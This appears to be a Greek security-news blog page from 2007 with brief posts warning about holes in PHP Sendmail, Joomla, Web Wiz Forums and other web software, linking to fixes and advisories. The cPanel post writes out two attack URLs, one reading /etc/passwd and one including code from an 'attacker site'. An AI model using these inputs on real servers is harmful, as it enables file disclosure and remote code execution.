Τρύπα στο SendmailSend function του php
Όσοι από εσάς τρέχουν PHP applications όπως WordPress, Mantis, xoops και άλλα με PHP safe_mode disable πιθανόν να βρεθείτε εκτεθειμένοι εσείς και ο server σας.
Κατεβάστε updates για το script σας.


Στους server του tip.gr http://4gr.net
το PHP safe_mode είναι enabled για όλους και δεν θα υπάρξει πρόβλημα.
http://sourceforge.net/tracker/index.php?func=detail&aid=1734811&group_id=26031&atid=385707

Από: Alex - 22/6/2007
Καμία απάντηση | Σχολίασε | Ψήφισε η καταχώρησε σε δίκτυο social news

Active Link Engine SQL Injection

Το script Active Link Engine http://www.activewebsoftwares.com/productinfo.aspx?productid=7&Tabopen

Η τρύπα
http://www.securityfocus.com/bid/23080/exploit

Από: gr - 24/3/2007
Καμία απάντηση | Σχολίασε | Ψήφισε η καταχώρησε σε δίκτυο social news

Joomla Remote File Include Τρύπες.

Η σελίδα αναφέρει το hack και την λύση.

http://www.securityfocus.com/archive/1/463660

Από: gr - 24/3/2007
Καμία απάντηση | Σχολίασε | Ψήφισε η καταχώρησε σε δίκτυο social news

Προσοχή τρύπα (SQL Injection ) στο Web Wiz Forums 8.05


http://www.webwizguide.com/news/news_item.asp?NewsID=102


Αναβαθμίστε τώρα σε 8.05a
http://www.webwizguide.info/web_wiz_forums/default.asp

Αναλυτικά:
http://ifsec.blogspot.com/2007/03/web-wiz-forums-805-mysql-version-sql.html

Από: gr - 21/3/2007
Καμία απάντηση | Σχολίασε | Ψήφισε η καταχώρησε σε δίκτυο social news

2 ακόμη τρύπες στο cPanel (Multiple Local File Include)

cPanel Multiple Local File Include Vulnerabilities

http://example.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd
http://example.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=attacker site


http://www.securityfocus.com/bid/22915/exploit

Από: gr - 14/3/2007
Καμία απάντηση | Σχολίασε | Ψήφισε η καταχώρησε σε δίκτυο social news